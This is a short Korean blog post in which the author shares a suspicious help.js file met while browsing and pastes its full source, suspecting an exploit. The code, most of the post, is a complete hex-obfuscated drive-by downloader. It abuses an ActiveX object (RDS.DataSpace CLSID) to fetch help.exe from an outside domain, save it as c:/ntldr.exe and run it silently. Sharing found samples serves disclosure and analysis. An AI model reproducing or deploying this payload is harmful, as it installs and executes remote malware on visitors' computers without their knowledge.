혹시 파이어폭스로 인터넷 서핑하다가 help.js를 다운로드한다는 팝업창이 나온 적이 있나요?

오늘 여러 사이트를 방문하다가 하나를 찾아 내서 다운로드하여 보았는데,

정확한 코드는 분석을 해봐야겠지만,

그냥 느낌에는 '익스플로잇'으로 보입니다.

아래는 소스 코드 입니다.

졸려서 아직 사이트가 어디였는지를 '재현'하고 있지 못합니다. T.T..

일단 자고, 내일 찾아 봐야겠습니다.

document.writeln("<script language=javascript>");
document.writeln("try");
document.writeln("{");
document.writeln("    eval(\"\\x76\\x61\\x72\\x20\\x64\\x66\\x20\\x3D\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x28\\x27\\x6F\\x62\\x6A\\x65\\x63\\x74\\x27\\x29\\x3B\");");
document.writeln("    eval(\"\\x64\\x66\\x2E\\x73\\x65\\x74\\x41\\x74\\x74\\x72\\x69\\x62\\x75\\x74\\x65\\x28\\x27\\x63\\x6C\\x61\\x73\\x73\\x69\\x64\\x27\\x2C\\x27\\x63\\x6C\\x73\\x69\\x64\\x3A\\x42\\x44\\x39\\x36\\x43\\x35\\x35\\x36\\x2D\\x36\\x35\\x41\\x33\\x2D\\x31\\x31\\x44\\x30\\x2D\\x39\\x38\\x33\\x41\\x2D\\x30\\x30\\x43\\x30\\x34\\x46\\x43\\x32\\x39\\x45\\x33\\x36\\x27\\x29\\x3B\");");
document.writeln("    eval(\"\\x76\\x61\\x72\\x20\\x78\\x50\\x6F\\x73\\x74\\x3D\\x64\\x66\\x2E\\x43\\x72\\x65\\x61\\x74\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x27\\x4D\\x69\\x63\\x72\\x6F\\x73\\x6F\\x66\\x74\\x2E\\x58\\x4D\\x4C\\x48\\x54\\x54\\x50\\x27\\x2C\\x27\\x27\\x29\\x3B\");");
document.writeln("    eval(\"\\x78\\x50\\x6F\\x73\\x74\\x2E\\x4F\\x70\\x65\\x6E\\x28\\x27\\x47\\x45\\x54\\x27\\x2C\\x27\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x67\\x69\\x73\\x61\\x37\\x39\\x2E\\x63\\x6F\\x6D\\x2F\\x68\\x65\\x6C\\x70\\x2E\\x65\\x78\\x65\\x27\\x2C\\x30\\x29\\x3B\");");
document.writeln("");
document.writeln("    eval(\"\\x78\\x50\\x6F\\x73\\x74\\x2E\\x53\\x65\\x6E\\x64\\x28\\x29\\x3B\\x76\\x61\\x72\\x20\\x73\\x47\\x65\\x74\\x3D\\x64\\x66\\x2E\\x43\\x72\\x65\\x61\\x74\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x27\\x41\\x44\\x4F\\x44\\x42\\x2E\\x53\\x74\\x72\\x65\\x61\\x6D\\x27\\x2C\\x27\\x27\\x29\\x3B\");");
document.writeln("    eval(\"\\x73\\x47\\x65\\x74\\x2E\\x4D\\x6F\\x64\\x65\\x3D\\x33\\x3B\\x73\\x47\\x65\\x74\\x2E\\x54\\x79\\x70\\x65\\x3D\\x31\\x3B\\x73\\x47\\x65\\x74\\x2E\\x4F\\x70\\x65\\x6E\\x28\\x29\\x3B\");");
document.writeln("    eval(\"\\x73\\x47\\x65\\x74\\x2E\\x57\\x72\\x69\\x74\\x65\\x28\\x78\\x50\\x6F\\x73\\x74\\x2E\\x52\\x65\\x73\\x70\\x6F\\x6E\\x73\\x65\\x42\\x6F\\x64\\x79\\x29\\x3B\");");
document.writeln("    eval(\"\\x73\\x47\\x65\\x74\\x2E\\x53\\x61\\x76\\x65\\x54\\x6F\\x46\\x69\\x6C\\x65\\x28\\x27\\x63\\x3A\\x2F\\x6E\\x74\\x6C\\x64\\x72\\x2E\\x65\\x78\\x65\\x27\\x2C\\x32\\x29\\x3B\");");
document.writeln("    eval(\"\\x76\\x61\\x72\\x20\\x78\\x20\\x3D\\x20\\x64\\x66\\x2E\\x43\\x72\\x65\\x61\\x74\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x27\\x77\\x73\\x63\\x72\\x69\\x70\\x74\\x2E\\x73\\x68\\x65\\x6C\\x6C\\x27\\x2C\\x27\\x27\\x29\\x3B\");");
document.writeln("    eval(\"\\x78\\x2E\\x72\\x75\\x6E\\x28\\x27\\x63\\x3A\\x2F\\x6E\\x74\\x6C\\x64\\x72\\x2E\\x65\\x78\\x65\\x27\\x2C\\x30\\x29\\x3B\");");
document.writeln("    eval(\"\");");
document.writeln("    ");
document.writeln("}");
document.writeln("catch (error)");
document.writeln("{");
document.writeln("}");
document.writeln("<\/script>");
document.writeln("");
document.writeln("");
document.writeln("")

reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus


    Web Analytics Blogs Directory